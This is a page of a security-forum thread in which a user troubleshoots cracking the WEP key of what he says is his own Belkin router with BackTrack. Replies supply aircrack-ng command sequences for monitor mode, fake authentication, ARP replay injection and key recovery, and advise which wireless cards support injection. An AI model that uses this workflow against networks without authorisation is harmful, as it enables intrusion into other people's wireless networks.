Page 1 of 3 123 LastLast
Results 1 to 10 of 23

Thread: how to use airdump, aireplay, aircrack

  1. #1

    Default how to use airdump, aireplay, aircrack

    Hi,

    Using back track got a belkin router & belkin wireless card

    cant seem to get my head around this below, i have started the monitor using airmon-ng start eth1 & it confirms monitor mode enalbed

    I use the command iwconfig & I get
    eth1 IEEE 802.11b/g ESSIDff/any Nickname:"Broadcom 4318"
    Mode:Monitor Frequency=2.484 GHz Access Point: Invalid

    Now i notice that the Access point shows Invalid as above
    I then stop the airmon-ng & restart doing
    airmon-ng start eth1 11 (where 11 is my channel)

    I then start airodump-ng eth1 & get my BSSID for my router, & I then open a new shell & run the following

    I have tried both ways

    aireplay-ng -1 0 -e myrouter -a (my router mac) -h (my card MAC) eth1

    & method below

    aireplay-ng -1 6000 -o 1 -q 10 -e myrouter -a (my router mac) -h (CARD MAC ADDRESS) eth1

    but all i seem to keep getting is

    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request

    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID -a option) is correct.
    * Try to change the number of packets -o option
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate iwconfig <iface> rate 1M

    can anyone shed some light on this - also does the driver need to be configured in anyways?

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    unplug card..re-insert it then....



    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bddid (AP MAC) eth1
    aireplay-ng -1 0 -a (my router mac) -h (my card MAC) eth1

    the -e option is useless and considered a waste or time and energy by me in the aireplay-ng -1 0 command
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3

    Default

    ok, i loaded back track
    removed card & re-inserted it

    done
    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bddid (AP MAC) eth1
    **--bddid unknown - so i take it you meant --bssid
    this then gives me my SSID & im getting beacons
    i then done
    aireplay-ng -1 0 -a (my router mac) -h (my card MAC) eth1
    but it says
    **please specify a -e BSSID**

    so i'm still kinda stuck as i'ts not sending packets
    or more to speak - it's not injecting packets, i check the airodump shell & i dont get any data, or any #s

    Is there anything else I can try?
    tks

  4. #4
    Junior Member
    Join Date
    Oct 2006
    Posts
    33

    Default

    Did you use:

    aireplay-ng -1 0 -e (essid) -a (my router mac) -h (my card MAC) eth1

    after it told you to add the essid? That should associate your card to the AP. Then you need to use:

    aireplay-ng -3 -b (my router mac) -h (my card mac) eth1

    to actually start injecting.

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    injection in broadcom is scetchy

  6. #6

    Default

    Hi Mike27 after it asked me to add the essid, i then done below

    aireplay-ng -1 0 -e belkin54g -a (my router mac) -h (my card MAC) eth1
    & it still done
    Sending Authentication Request
    Sending Authentication Request
    Sending Authentication Request
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID -a option) is correct.
    * Try to change the number of packets -o option
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
    Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
    the transmit rate iwconfig <iface> rate 1M

    I have not tried below as yet as after seeing above it may not work,
    i will try again later when i get home
    aireplay-ng -3 -b (my router mac) -h (my card mac) eth1

    Is there anything else I can also try

  7. #7
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Take a look at my video here...

    http://forums.remote-exploit.org/showthread.php?t=7633

    even though its for an Atheros chipped card....it should help you. Just don't do the airmon-ng start wifi0 command..ehh..heres a script specifically for you not an atheros card...

    airmon-ng stop eth1
    airmon-ng start eth1 11
    airodump-ng -c 11 --bssid (AP MAC) eth1

    now..open a new shell window while letting airodump run and type....

    aireplay-ng -1 0 -e essid -a (my router mac) -h (my card MAC) eth1
    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1
    now wait.....look at your airodump window and wait for the ivs to increase. Then when you get enough data/Ivs...
    aircrack-ng --bssid (AP MAC) whatever-01.cap (if you know its 64 or 128 bit encryption ..add the -n 64 or -n 128 option to aircrack.

    Now I added the -e option in the aireplay-ng line cause it may just be my Atheros that will disallow the essid and still work...but listen to purehate..broadcom is at best half assed and sketchy...please buy a real card like an Atheros or Reltek chipped card. Much less complications..if any
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  8. #8

    Default still doesnt work

    darn this still dont work - i may need to get me a new wireless card
    Atheros you say?

    ebay item number 330150397916


    this one any good?

  9. #9
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Per our PMs..I told ya to buy the card I have. Its good..it works right out of the box..you can mod it with an external antenna..its cheap, and its Atheros chipped Super G!

    Airlink AWLC 4130
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  10. #10

    Default

    i've been searching ebay & cant find any Airlink AWLC 4130, searchin worldwide & only have PCI cards - i need a pcmcia card or a usb - maybe its just not meant for me

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •